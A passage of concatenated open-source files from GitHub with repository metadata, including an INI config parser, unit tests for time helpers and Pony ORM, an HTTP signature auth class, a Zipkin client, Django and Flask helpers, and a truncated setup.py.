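# set, in which case they are delegated to that object's <srcattrname>. This is
# how INISection instances share optionxform with their parent INIConfig.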
def _make_xform_property(myattrname, srcattrname=None):
private_attrname = myattrname + 'value'
private_srcname = myattrname + 'source'
if srcattrname is None:
srcattrname = myattrname
def getfn(self):
srcobj = getattr(self, private_srcname)
if srcobj is not None:
return getattr(srcobj, srcattrname)
else:
return getattr(self, private_attrname)
def setfn(self, value):
srcobj = getattr(self, private_srcname)
if srcobj is not None:
setattr(srcobj, srcattrname, value)
else:
setattr(self, private_attrname, value)
return property(getfn, setfn)
class INISection(config.ConfigNamespace):
_lines = None
_options = None
_defaults = None
_optionxformvalue = None
_optionxformsource = None
_compat_skip_empty_lines = set()
def __init__(self, lineobj, defaults = None,
optionxformvalue=None, optionxformsource=None):
self._lines = [lineobj]
self._defaults = defaults
self._optionxformvalue = optionxformvalue
self._optionxformsource = optionxformsource
self._options = {}
_optionxform = _make_xform_property('_optionxform')
def _compat_get(self, key):
# identical to __getitem__ except that _compat_XXX
# is checked for backward-compatible handling
if key == '__name__':
return self._lines[-1].name
if self._optionxform: key = self._optionxform(key)
try:
value = self._options[key].value
del_empty = key in self._compat_skip_empty_lines
except KeyError:
if self._defaults and key in self._defaults._options:
value = self._defaults._options[key].value
del_empty = key in self._defaults._compat_skip_empty_lines
else:
raise
if del_empty:
value = re.sub('\n+', '\n', value)
return value
def __getitem__(self, key):
if key == '__name__':
return self._lines[-1].name
if self._optionxform: key = self._optionxform(key)
try:
return self._options[key].value
except KeyError:
if self._defaults and key in self._defaults._options:
return self._defaults._options[key].value
else:
raise
def __setitem__(self, key, value):
if self._optionxform: xkey = self._optionxform(key)
else: xkey = key
if xkey in self._compat_skip_empty_lines:
self._compat_skip_empty_lines.remove(xkey)
if xkey not in self._options:
# create a dummy object - value may have multiple lines
obj = LineContainer(OptionLine(key, ''))
self._lines[-1].add(obj)
self._options[xkey] = obj
# the set_value() function in LineContainer
# automatically handles multi-line values
self._options[xkey].value = value
def __delitem__(self, key):
if self._optionxform: key = self._optionxform(key)
if key in self._compat_skip_empty_lines:
self._compat_skip_empty_lines.remove(key)
for l in self._lines:
remaining = []
for o in l.contents:
if isinstance(o, LineContainer):
n = o.name
if self._optionxform: n = self._optionxform(n)
if key != n: remaining.append(o)
else:
remaining.append(o)
l.contents = remaining
del self._options[key]
def __iter__(self):
d = set()
for l in self._lines:
for x in l.contents:
if isinstance(x, LineContainer):
if self._optionxform:
ans = self._optionxform(x.name)
else:
ans = x.name
if ans not in d:
yield ans
d.add(ans)
if self._defaults:
for x in self._defaults:
if x not in d:
yield x
d.add(x)
def _new_namespace(self, name):
raise Exception('No sub-sections allowed', name)
def make_comment(line):
return CommentLine(line.rstrip('\n'))
def readline_iterator(f):
"""iterate over a file by only using the file object's readline method"""
have_newline = False
while True:
line = f.readline()
if not line:
if have_newline:
yield ""
return
if line.endswith('\n'):
have_newline = True
else:
have_newline = False
yield line
def lower(x):
return x.lower()
class INIConfig(config.ConfigNamespace):
_data = None
_sections = None
_defaults = None
_optionxformvalue = None
_optionxformsource = None
_sectionxformvalue = None
_sectionxformsource = None
_parse_exc = None
_bom = False
def __init__(self, fp=None, defaults=None, parse_exc=True,
optionxformvalue=lower, optionxformsource=None,
sectionxformvalue=None, sectionxformsource=None):
self._data = LineContainer()
self._parse_exc = parse_exc
self._optionxformvalue = optionxformvalue
self._optionxformsource = optionxformsource
self._sectionxformvalue = sectionxformvalue
self._sectionxformsource = sectionxformsource
self._sections = {}
if defaults is None: defaults = {}
self._defaults = INISection(LineContainer(), optionxformsource=self)
for name, value in defaults.iteritems():
self._defaults[name] = value
if fp is not None:
self._readfp(fp)
_optionxform = _make_xform_property('_optionxform', 'optionxform')
_sectionxform = _make_xform_property('_sectionxform', 'optionxform')
def __getitem__(self, key):
if key == DEFAULTSECT:
return self._defaults
if self._sectionxform: key = self._sectionxform(key)
return self._sections[key]
def __setitem__(self, key, value):
raise Exception('Values must be inside sections', key, value)
def __delitem__(self, key):
if self._sectionxform: key = self._sectionxform(key)
for line in self._sections[key]._lines:
self._data.contents.remove(line)
del self._sections[key]
def __iter__(self):
d = set()
d.add(DEFAULTSECT)
for x in self._data.contents:
if isinstance(x, LineContainer):
if x.name not in d:
yield x.name
d.add(x.name)
def _new_namespace(self, name):
if self._data.contents:
self._data.add(EmptyLine())
obj = LineContainer(SectionLine(name))
self._data.add(obj)
if self._sectionxform: name = self._sectionxform(name)
if name in self._sections:
ns = self._sections[name]
ns._lines.append(obj)
else:
ns = INISection(obj, defaults=self._defaults,
optionxformsource=self)
self._sections[name] = ns
return ns
def __str__(self):
if self._bom:
fmt = u'\ufeff%s'
else:
fmt = '%s'
return fmt % self._data.__str__()
__unicode__ = __str__
_line_types = [EmptyLine, CommentLine,
SectionLine, OptionLine,
ContinuationLine]
def _parse(self, line):
for linetype in self._line_types:
lineobj = linetype.parse(line)
if lineobj:
return lineobj
else:
# can't parse line
return None
def _readfp(self, fp):
cur_section = None
cur_option = None
cur_section_name = None
cur_option_name = None
pending_lines = []
pending_empty_lines = False
try:
fname = fp.name
except AttributeError:
fname = '<???>'
linecount = 0
exc = None
line = None
for line in readline_iterator(fp):
# Check for BOM on first line
if linecount == 0 and isinstance(line, unicode):
if line[0] == u'\ufeff':
line = line[1:]
self._bom = True
lineobj = self._parse(line)
linecount += 1
if not cur_section and not isinstance(lineobj,
(CommentLine, EmptyLine, SectionLine)):
if self._parse_exc:
raise MissingSectionHeaderError(fname, linecount, line)
else:
lineobj = make_comment(line)
if lineobj is None:
if self._parse_exc:
if exc is None: exc = ParsingError(fname)
exc.append(linecount, line)
lineobj = make_comment(line)
if isinstance(lineobj, ContinuationLine):
if cur_option:
if pending_lines:
cur_option.extend(pending_lines)
pending_lines = []
if pending_empty_lines:
optobj._compat_skip_empty_lines.add(cur_option_name)
pending_empty_lines = False
cur_option.add(lineobj)
else:
# illegal continuation line - convert to comment
if self._parse_exc:
if exc is None: exc = ParsingError(fname)
exc.append(linecount, line)
lineobj = make_comment(line)
if isinstance(lineobj, OptionLine):
if pending_lines:
cur_section.extend(pending_lines)
pending_lines = []
pending_empty_lines = False
cur_option = LineContainer(lineobj)
cur_section.add(cur_option)
if self._optionxform:
cur_option_name = self._optionxform(cur_option.name)
else:
cur_option_name = cur_option.name
if cur_section_name == DEFAULTSECT:
optobj = self._defaults
else:
optobj = self._sections[cur_section_name]
optobj._options[cur_option_name] = cur_option
if isinstance(lineobj, SectionLine):
self._data.extend(pending_lines)
pending_lines = []
pending_empty_lines = False
cur_section = LineContainer(lineobj)
self._data.add(cur_section)
cur_option = None
cur_option_name = None
if cur_section.name == DEFAULTSECT:
self._defaults._lines.append(cur_section)
cur_section_name = DEFAULTSECT
else:
if self._sectionxform:
cur_section_name = self._sectionxform(cur_section.name)
else:
cur_section_name = cur_section.name
if cur_section_name not in self._sections:
self._sections[cur_section_name] = \
INISection(cur_section, defaults=self._defaults,
optionxformsource=self)
else:
self._sections[cur_section_name]._lines.append(cur_section)
if isinstance(lineobj, (CommentLine, EmptyLine)):
pending_lines.append(lineobj)
if isinstance(lineobj, EmptyLine):
pending_empty_lines = True
self._data.extend(pending_lines)
if line and line[-1]=='\n':
self._data.add(EmptyLine())
if exc:
raise exc
| {
"content_hash": "38e1d5c9529d5bbff6bbdd7a3e22f51c",
"timestamp": "",
"source": "github",
"line_count": 634,
"max_line_length": 83,
"avg_line_length": 32.09305993690852,
"alnum_prop": 0.5350665945839681,
"repo_name": "m00dawg/holland",
"id": "56f4c30768d01eddaf1d11428692d5a4c8313260",
"size": "20347",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plugins/holland.backup.mysqldump/holland/backup/mysqldump/util/ini.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "7884"
},
{
"name": "Python",
"bytes": "1720427"
},
{
"name": "Roff",
"bytes": "3761"
},
{
"name": "Shell",
"bytes": "5001"
}
],
"symlink_target": ""
} |
__revision__ = "$Id: test_Acspy_Common_TimeHelper.py,v 1.1.1.1 2012/03/07 17:40:45 acaproni Exp $"
#--REGULAR IMPORTS-------------------------------------------------------------
import unittest
import time
import acstime
#--ACS IMPORTS____-------------------------------------------------------------
import Acspy.Common.TimeHelper as TimeHelper
#------------------------------------------------------------------------------
def fixedTime():
return 1207768989.9850370
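# 1207768989.9850370 is a Unix timestamp (seconds since 1970-01-01). ACS epochs
# appear to count 100-ns ticks from a 1582-10-15 base, ACE_BEGIN being the
# offset to 1970, so the value checked below is
# 1207768989.9850370 * 1e7 + acstime.ACE_BEGIN = 134270617899850370.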
class GetTimeStampCheck(unittest.TestCase):
"""Test that the getTimeStamp function is working correctly."""
def setUp(self):
self.savetime = time.time
time.time = fixedTime
def tearDown(self):
time.time = self.savetime
def testKnownDate(self):
'''getTimeStamp reports correct ACS timestamp for a known value'''
rtn = TimeHelper.getTimeStamp()
self.assertEqual(True, isinstance(rtn, acstime.Epoch))
self.assertEqual(134270617899850370L, rtn.value)
class TimeUtilCheck(unittest.TestCase):
"""Test that the TimeUtil class works correctly."""
def setUp(self):
self.th = TimeHelper.TimeUtil()
pass
def tearDown(self):
pass
def testPy2EpochEpoch(self):
'''TimeUtil.py2epoch handles Python epoch correctly'''
rtn = self.th.py2epoch(0)
self.assertEqual(True, isinstance(rtn, acstime.Epoch))
self.assertEqual(acstime.ACE_BEGIN, rtn.value)
def testPy2EpochNegative(self):
'''TimeUtil.py2epoch handles negative values correctly '''
rtn = self.th.py2epoch(-1)
self.assertEqual(10000000L, acstime.ACE_BEGIN - rtn.value)
def testPy2EpochACSEpoch(self):
'''TimeUtil.py2epoch handles ACS epoch correctly '''
rtn = self.th.py2epoch(-acstime.ACE_BEGIN / 10000000L)
self.assertEqual(0, rtn.value)
def testEpoch2PyEpoch(self):
'''TimeUtil.epoch2py handles ACS epoch correctly'''
rtn = self.th.epoch2py(acstime.Epoch(0))
self.assertEqual(True, isinstance(rtn, long))
self.assertEqual(-acstime.ACE_BEGIN / 10000000L, rtn)
def testEpoch2PyPyEpoch(self):
'''TimeUtil.epoch2py handles Python epoch correctly'''
rtn = self.th.epoch2py(acstime.Epoch(acstime.ACE_BEGIN))
self.assertEqual(0L, rtn)
def testEpoch2PyNegative(self):
'''TimeUtil.epoch2py handles negative values correctly '''
rtn = self.th.epoch2py(acstime.Epoch(acstime.ACE_BEGIN - 10000000L))
self.assertEqual(-1L, rtn)
pass
def testEpoch2PyLong(self):
'''TimeUtil.epoch2py handles long values correctly '''
rtn = self.th.epoch2py(long(acstime.ACE_BEGIN))
self.assertEqual(0L, rtn)
def testPy2DurationZero(self):
'''TimeUtil.py2duration handles 0 value correctly'''
rtn = self.th.py2duration(0)
self.assertEqual(True, isinstance(rtn, acstime.Duration))
self.assertEqual(0, rtn.value)
def testPy2DurationNegative(self):
'''TimeUtil.py2duration handles negative values correctly '''
rtn = self.th.py2duration(-1)
self.assertEqual(-10000000L, rtn.value)
def testDuration2PyZero(self):
'''TimeUtil.duration2py handles 0 value correctly'''
rtn = self.th.duration2py(acstime.Duration(0))
self.assertEqual(True, isinstance(rtn, long))
self.assertEqual(0, rtn)
def testDuration2PyNegative(self):
'''TimeUtil.duration2py handles negative values correctly '''
rtn = self.th.duration2py(acstime.Duration(-1))
self.assertEqual(-1, rtn)
def testDuration2PyLong(self):
'''TimeUtil.duration2py handles long values correctly '''
rtn = self.th.duration2py(0L)
self.assertEqual(0L, rtn)
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(GetTimeStampCheck))
suite.addTest(unittest.makeSuite(TimeUtilCheck))
return suite
if __name__ == "__main__":
unittest.main(defaultTest='suite')
#
# ___oOo___
| {
"content_hash": "f72d484c9c5d9f21ad29c9666affef18",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 98,
"avg_line_length": 34.58119658119658,
"alnum_prop": 0.634206623826001,
"repo_name": "csrg-utfsm/acscb",
"id": "eaec642161f800698ef2655eb753f5b68ed4a452",
"size": "5268",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "LGPL/CommonSoftware/acspycommon/test/test_Acspy_Common_TimeHelper.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "633"
},
{
"name": "Batchfile",
"bytes": "2346"
},
{
"name": "C",
"bytes": "751150"
},
{
"name": "C++",
"bytes": "7892598"
},
{
"name": "CSS",
"bytes": "21364"
},
{
"name": "Elixir",
"bytes": "906"
},
{
"name": "Emacs Lisp",
"bytes": "1990066"
},
{
"name": "FreeMarker",
"bytes": "7369"
},
{
"name": "GAP",
"bytes": "14867"
},
{
"name": "Gnuplot",
"bytes": "437"
},
{
"name": "HTML",
"bytes": "1857062"
},
{
"name": "Haskell",
"bytes": "764"
},
{
"name": "Java",
"bytes": "13573740"
},
{
"name": "JavaScript",
"bytes": "19058"
},
{
"name": "Lex",
"bytes": "5101"
},
{
"name": "Makefile",
"bytes": "1624406"
},
{
"name": "Module Management System",
"bytes": "4925"
},
{
"name": "Objective-C",
"bytes": "3223"
},
{
"name": "PLSQL",
"bytes": "9496"
},
{
"name": "Perl",
"bytes": "120411"
},
{
"name": "Python",
"bytes": "4191000"
},
{
"name": "Roff",
"bytes": "9920"
},
{
"name": "Shell",
"bytes": "1198375"
},
{
"name": "Smarty",
"bytes": "21615"
},
{
"name": "Tcl",
"bytes": "227078"
},
{
"name": "XSLT",
"bytes": "100454"
},
{
"name": "Yacc",
"bytes": "5006"
}
],
"symlink_target": ""
} |
from wsgiref.handlers import format_date_time
from six.moves.urllib.parse import urlparse
from requests.auth import AuthBase
from datetime import datetime
import six
import time
import hmac
import base64
import hashlib
import logging
log = logging.getLogger('bigstash.sign')
class Light_HTTPSignatureAuth(AuthBase):
def __init__(self, key_id='', secret='', algorithm='rsa-sha256',
headers=None, allow_agent=False):
self.algorithm = algorithm
self.key_id = key_id
self.secret = six.b(secret)
self.headers = headers
self.signature_string_head = self.build_header_content()
def build_header_content(self):
param_map = {'keyId': 'hmac-key-1',
'algorithm': self.algorithm,
'signature': '%s'}
if self.headers:
param_map['headers'] = ' '.join(self.headers)
kv = map('{0[0]}="{0[1]}"'.format, param_map.items())
kv_string = ','.join(kv)
sig_string = 'Signature {0}'.format(kv_string)
return sig_string
def hmac_sha256(self, data):
return hmac.new(self.secret, data, digestmod=hashlib.sha256).digest()
def sign(self, data):
try:
signer = getattr(self, self.algorithm.replace('-', '_'))
except AttributeError:
            raise NotImplementedError(
                "algorithm {} not implemented".format(self.algorithm))
return base64.b64encode(signer(data.encode('utf-8'))).decode('ascii')
def __call__(self, r):
url_parts = urlparse(r.url)
if 'Date' not in r.headers:
now = datetime.now()
stamp = time.mktime(now.timetuple())
r.headers['Date'] = format_date_time(stamp)
if self.headers:
signable_list = []
for x in self.headers:
if x in r.headers:
signable_list.append("%s: %s" % (x, r.headers[x]))
elif x == '(request-target)':
signable_list.append(
"%s: %s %s" % (
x,
r.method.lower(),
url_parts.path if not url_parts.query else '%s?%s' % (url_parts.path, url_parts.query)))
elif x == 'host':
signable_list.append("%s: %s" % (x, url_parts.netloc))
signable = '\n'.join(signable_list)
else:
signable = r.headers['Date']
log.debug("data to sign: \n{}".format(signable))
signature = self.sign(signable)
r.headers['Authorization'] = self.signature_string_head % signature
return r
HTTPSignatureAuth = Light_HTTPSignatureAuth
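# Illustrative use with requests (URL and credentials are made up). Only an
# hmac_sha256 signer is defined, so pass algorithm='hmac-sha256' rather than
# the 'rsa-sha256' default; note also that build_header_content() hardcodes
# keyId to 'hmac-key-1' regardless of the key_id argument.
#   import requests
#   auth = HTTPSignatureAuth(key_id='hmac-key-1', secret='my-secret',
#                            algorithm='hmac-sha256',
#                            headers=['(request-target)', 'host', 'date'])
#   requests.get('https://example.com/api/', auth=auth)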
| {
"content_hash": "1daaaced6e1c12c55e19e058ead8a9db",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 116,
"avg_line_length": 36.58108108108108,
"alnum_prop": 0.5526413003324714,
"repo_name": "longaccess/bigstash-python",
"id": "27751f0324663289f1b17d866976005eed119ca0",
"size": "2707",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "BigStash/sign.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "13821"
},
{
"name": "Makefile",
"bytes": "401"
},
{
"name": "Python",
"bytes": "107365"
}
],
"symlink_target": ""
} |
from scribe_client import ScribeClient
from trace import Annotation, Trace, Endpoint
from collections import defaultdict
from formatters import base64_thrift_formatter
class ZipkinClient(ScribeClient):
DEFAULT_END_ANNOTATIONS = ("ss", "cr", "end")
def __init__(self, port, host):
super(ZipkinClient, self).__init__(port, host)
self._annotations_for_trace = defaultdict(list)
def create_trace(self, event):
service = event["trace_name"]
trace_id = event["trace_id"]
span_id = event["span_id"]
parent_span = event["parent_span_id"]
if parent_span == 0:
parent_span = None
trace = Trace(service, trace_id, span_id, parent_span)
return trace
def create_annotation(self, event, kind):
if kind == "keyval_string":
key = event["key"]
val = event["val"]
annotation = Annotation.string(key, val)
elif kind == "keyval_integer":
key = event["key"]
val = str(event["val"])
annotation = Annotation.string(key, val)
elif kind == "timestamp":
timestamp = event.timestamp
            # event timestamps are in nanoseconds; drop the last three digits
            # to get the microsecond precision zipkin expects
timestamp = str(timestamp)
timestamp = timestamp[:-3]
event_name = event["event"]
annotation = Annotation.timestamp(event_name, int(timestamp))
# create and set endpoint
port = event["port_no"]
service = event["service_name"]
ip = event["ip"]
endpoint = Endpoint(ip, int(port), service)
annotation.endpoint = endpoint
print annotation
return annotation
def record(self, trace, annotation):
self.scribe_log(trace, [annotation])
'''
trace_key = (trace.trace_id, trace.span_id)
self._annotations_for_trace[trace_key].append(annotation)
if (annotation.name in self.DEFAULT_END_ANNOTATIONS):
saved_annotations = self._annotations_for_trace[trace_key]
del self._annotations_for_trace[trace_key]
self.scribe_log(trace, saved_annotations)
print "Record event"
'''
def scribe_log(self, trace, annotations):
trace._endpoint = None
message = base64_thrift_formatter(trace, annotations)
category = 'zipkin'
return self.log(category, message)
| {
"content_hash": "75378d7e8d3a896175618c7bafc220b2",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 73,
"avg_line_length": 34.970588235294116,
"alnum_prop": 0.605130361648444,
"repo_name": "linuxbox2/blkin",
"id": "28118facb4c39d8256ff4b4de175cbb167f46873",
"size": "2397",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "babeltrace-plugins/zipkin/src/zipkin_logic/zipkin_client.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "29710"
},
{
"name": "C++",
"bytes": "16595"
},
{
"name": "CMake",
"bytes": "3278"
},
{
"name": "Makefile",
"bytes": "4645"
},
{
"name": "Python",
"bytes": "15112"
}
],
"symlink_target": ""
} |
"""An Ant wrapper that suppresses useless Ant output.
Ant build scripts output "BUILD SUCCESSFUL" and build timing at the end of
every build. In the Android build, this just adds a lot of useless noise to the
build output. This script forwards its arguments to ant, and prints Ant's
output up until the BUILD SUCCESSFUL line.
"""
import sys
from util import build_utils
def main(argv):
stdout = build_utils.CheckCallDie(['ant'] + argv[1:], suppress_output=True)
stdout = stdout.decode("utf-8").strip().split('\n')
for line in stdout:
if line.strip() == 'BUILD SUCCESSFUL':
break
print(line)
if __name__ == '__main__':
sys.exit(main(sys.argv))
| {
"content_hash": "208fce9505e1fd841d2163921046cb62",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 79,
"avg_line_length": 28,
"alnum_prop": 0.7023809523809523,
"repo_name": "shaochangbin/crosswalk",
"id": "6eca4fc0c6483a2b6c80e32c9156a8db9907abb0",
"size": "883",
"binary": false,
"copies": "1",
"ref": "refs/heads/background",
"path": "app/tools/android/gyp/ant.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "33431"
},
{
"name": "C++",
"bytes": "1069103"
},
{
"name": "Java",
"bytes": "460942"
},
{
"name": "JavaScript",
"bytes": "31135"
},
{
"name": "Objective-C",
"bytes": "17375"
},
{
"name": "Python",
"bytes": "148723"
},
{
"name": "Shell",
"bytes": "5182"
}
],
"symlink_target": ""
} |
"""Test URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
]
| {
"content_hash": "608e603e8d34c3af8a8c721938ee6bd2",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 79,
"avg_line_length": 36.19047619047619,
"alnum_prop": 0.6986842105263158,
"repo_name": "13lcp2000/CF_django_1-9-6",
"id": "a76b01124dc6d2a39a95e068d432048ad21834de",
"size": "760",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Test/Test/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "4613"
}
],
"symlink_target": ""
} |
from datetime import time, timedelta
import unittest
from convertish.util import SimpleTZInfo
class TestSimpleTZInfo(unittest.TestCase):
def test_utcoffset(self):
self.assertEquals(SimpleTZInfo(60).utcoffset(None), timedelta(minutes=60))
self.assertEquals(SimpleTZInfo(-60).utcoffset(None), timedelta(minutes=-60))
def test_dst(self):
tz = SimpleTZInfo(60)
self.assertEquals(tz.dst(None), timedelta())
def test_tzname(self):
self.assertEquals(SimpleTZInfo(0).tzname(None), "+00:00")
self.assertEquals(SimpleTZInfo(60).tzname(None), "+01:00")
self.assertEquals(SimpleTZInfo(90).tzname(None), "+01:30")
self.assertEquals(SimpleTZInfo(-60).tzname(None), "-01:00")
self.assertEquals(SimpleTZInfo(-90).tzname(None), "-01:30")
def test_affect(self):
self.assertEquals(time(1, 2, 3, 0, SimpleTZInfo(0)).isoformat(), '01:02:03+00:00')
self.assertEquals(time(1, 2, 3, 0, SimpleTZInfo(90)).isoformat(), '01:02:03+01:30')
self.assertEquals(time(1, 2, 3, 0, SimpleTZInfo(-90)).isoformat(), '01:02:03-01:30')
| {
"content_hash": "fd4cbf66b66914222a0de309706d7df2",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 92,
"avg_line_length": 39.857142857142854,
"alnum_prop": 0.6693548387096774,
"repo_name": "ish/convertish",
"id": "a6bc774e01b09f0b7fb3a63086d7fe8f2c00b399",
"size": "1116",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "convertish/tests/test_util.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "617020"
},
{
"name": "Python",
"bytes": "40340"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, print_function, division
import unittest
from pony.orm.core import *
db = Database('sqlite', ':memory:')
class Person(db.Entity):
name = Required(unicode)
age = Required(int)
db.generate_mapping(create_tables=True)
with db_session:
p1 = Person(name='John', age=22)
p2 = Person(name='Mary', age=18)
p3 = Person(name='Mike', age=25)
class TestFrames(unittest.TestCase):
@db_session
def test_select(self):
x = 20
result = select(p.id for p in Person if p.age > x)[:]
self.assertEqual(set(result), {1, 3})
@db_session
def test_select_str(self):
x = 20
result = select('p.id for p in Person if p.age > x')[:]
self.assertEqual(set(result), {1, 3})
@db_session
def test_left_join(self):
x = 20
result = left_join(p.id for p in Person if p.age > x)[:]
self.assertEqual(set(result), {1, 3})
@db_session
def test_left_join_str(self):
x = 20
result = left_join('p.id for p in Person if p.age > x')[:]
self.assertEqual(set(result), {1, 3})
@db_session
def test_get(self):
x = 23
result = get(p.id for p in Person if p.age > x)
self.assertEqual(result, 3)
@db_session
def test_get_str(self):
x = 23
result = get('p.id for p in Person if p.age > x')
self.assertEqual(result, 3)
@db_session
def test_exists(self):
x = 23
result = exists(p for p in Person if p.age > x)
self.assertEqual(result, True)
@db_session
def test_exists_str(self):
x = 23
result = exists('p for p in Person if p.age > x')
self.assertEqual(result, True)
@db_session
def test_entity_get(self):
x = 23
p = Person.get(lambda p: p.age > x)
self.assertEqual(p, Person[3])
@db_session
def test_entity_get_str(self):
x = 23
p = Person.get('lambda p: p.age > x')
self.assertEqual(p, Person[3])
@db_session
def test_entity_get_by_sql(self):
x = 25
p = Person.get_by_sql('select * from Person where age = $x')
self.assertEqual(p, Person[3])
@db_session
def test_entity_select_by_sql(self):
x = 25
p = Person.select_by_sql('select * from Person where age = $x')
self.assertEqual(p, [ Person[3] ])
@db_session
def test_entity_exists(self):
x = 23
result = Person.exists(lambda p: p.age > x)
self.assertTrue(result)
@db_session
def test_entity_exists_str(self):
x = 23
result = Person.exists('lambda p: p.age > x')
self.assertTrue(result)
@db_session
def test_entity_select(self):
x = 20
result = Person.select(lambda p: p.age > x)[:]
self.assertEqual(set(result), {Person[1], Person[3]})
@db_session
def test_entity_select_str(self):
x = 20
result = Person.select('lambda p: p.age > x')[:]
self.assertEqual(set(result), {Person[1], Person[3]})
@db_session
def test_order_by(self):
x = 20
y = -1
result = Person.select(lambda p: p.age > x).order_by(lambda p: p.age * y)[:]
self.assertEqual(result, [Person[3], Person[1]])
@db_session
def test_order_by_str(self):
x = 20
y = -1
result = Person.select('lambda p: p.age > x').order_by('p.age * y')[:]
self.assertEqual(result, [Person[3], Person[1]])
@db_session
def test_filter(self):
x = 20
y = 'M'
result = Person.select(lambda p: p.age > x).filter(lambda p: p.name.startswith(y))[:]
self.assertEqual(result, [Person[3]])
@db_session
def test_filter_str(self):
x = 20
y = 'M'
result = Person.select('lambda p: p.age > x').filter('p.name.startswith(y)')[:]
self.assertEqual(result, [Person[3]])
@db_session
def test_db_select(self):
x = 20
result = db.select('name from Person where age > $x order by name')
self.assertEqual(result, ['John', 'Mike'])
@db_session
def test_db_get(self):
x = 18
result = db.get('name from Person where age = $x')
self.assertEqual(result, 'Mary')
@db_session
def test_db_execute(self):
x = 18
result = db.execute('select name from Person where age = $x').fetchone()
self.assertEqual(result, ('Mary',))
@db_session
def test_db_exists(self):
x = 18
result = db.exists('name from Person where age = $x')
self.assertEqual(result, True)
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "2dd4bc941ba74380a0797d8236b38dce",
"timestamp": "",
"source": "github",
"line_count": 171,
"max_line_length": 93,
"avg_line_length": 28.450292397660817,
"alnum_prop": 0.5405960945529291,
"repo_name": "Ahmad31/Web_Flask_Cassandra",
"id": "7d9dd5df7624d617d1172bde5288a10f47be60cf",
"size": "4865",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "flask/lib/python2.7/site-packages/pony/orm/tests/test_frames.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "34860"
},
{
"name": "CSS",
"bytes": "6270"
},
{
"name": "HTML",
"bytes": "86875"
},
{
"name": "JavaScript",
"bytes": "7232"
},
{
"name": "Jupyter Notebook",
"bytes": "181"
},
{
"name": "Python",
"bytes": "12265503"
},
{
"name": "Shell",
"bytes": "3248"
}
],
"symlink_target": ""
} |
import urllib.parse
import flask
from dila import config
from dila.frontend.flask import languages
from dila.frontend.flask import user_tools
def setup_app(app):
@app.template_global()
def static_url(filename):
if config.STATIC_URL:
return urllib.parse.urljoin(config.STATIC_URL, filename)
return flask.url_for('static', filename=filename)
def setup_language_context(blueprint):
@blueprint.context_processor
def inject_languages_menu():
return {
'languages_form': languages.get_new_form(),
'languages_links': list(languages.get_language_links()),
'current_language_code': languages.current_language_code(),
'current_language': languages.current_language(),
}
def setup_user_context(blueprint):
@blueprint.context_processor
    def inject_current_user_menu():
return {
'current_user': user_tools.current_user(),
}
| {
"content_hash": "b0671fa470477566c3bb3c2cba5077fc",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 71,
"avg_line_length": 28.235294117647058,
"alnum_prop": 0.659375,
"repo_name": "socialwifi/dila",
"id": "2c3847fc74c6fa8f2b7d0d307ae1badc02d34591",
"size": "960",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dila/frontend/flask/template_tools.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "11934"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "116973"
},
{
"name": "Shell",
"bytes": "1491"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages
from os import path
import re
# Get current path
here = path.abspath(path.dirname(__file__))
# Get version from strikepackage.py
with open(path.join(here, 'strikepackage/strikepackage.py')) as f:
version_file = f.read()
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]",
version_file, re.M)
if version_match:
version = version_match.group(1)
else:
raise RuntimeError("Unable to find version string.")
# Get long description from README and HISTORY
with open(path.join(here, 'README.rst')) as f:
readme = f.read()
with open(path.join(here, 'HISTORY.rst')) as f:
history = f.read()
# Dependencies
requires = [
'Jinja2',
'docopt',
'kaptan',
'requests',
'progress',
'python-simple-hipchat',
'schema',
'XenAPI',
'PyYAML',
]
# Setup
setup(
name='strikepackage',
version=version,
description='A command line tool to deploy virtual machines on XenServer.',
long_description=readme + '\n\n' + history,
author='Paul Liu',
author_email='[email protected]',
url='https://github.com/pwyliu/strikepackage',
license='MIT',
    zip_safe=False,  # do not install as a zipped egg
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: System Administrators',
'Topic :: System :: Systems Administration',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 2 :: Only',
